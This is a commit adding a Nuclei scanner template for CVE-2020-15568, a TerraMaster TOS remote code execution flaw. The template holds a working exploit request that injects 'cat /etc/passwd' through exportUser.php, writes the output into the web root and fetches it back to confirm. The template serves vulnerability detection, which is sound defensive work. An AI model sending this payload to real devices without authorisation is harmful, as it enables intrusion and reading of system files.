Add RCE TerraMaster CVE-2020-15568 (#809)

* Create CVE-2020-15568.yaml
2021-02-10 10:51:42 +00:00 · 2021-02-10 10:51:42 +00:00 · d8aa124529
parent 783666b4e2
commit d8aa124529
1 changed files with 32 additions and 0 deletions
--- a/cves/2020/CVE-2020-15568.yaml
+++ b/cves/2020/CVE-2020-15568.yaml
@ -0,0 +1,32 @@
+id: CVE-2020-15568
+
+info:
+  name: TerraMaster TOS v4.1.24 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
+  tags: cve,cve2020,terramaster,rce
+
+requests:
+  - raw:
+      - |
+        GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        GET /include/nuclei.txt HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        part: body
+      - type: status
+        status:
+          - 200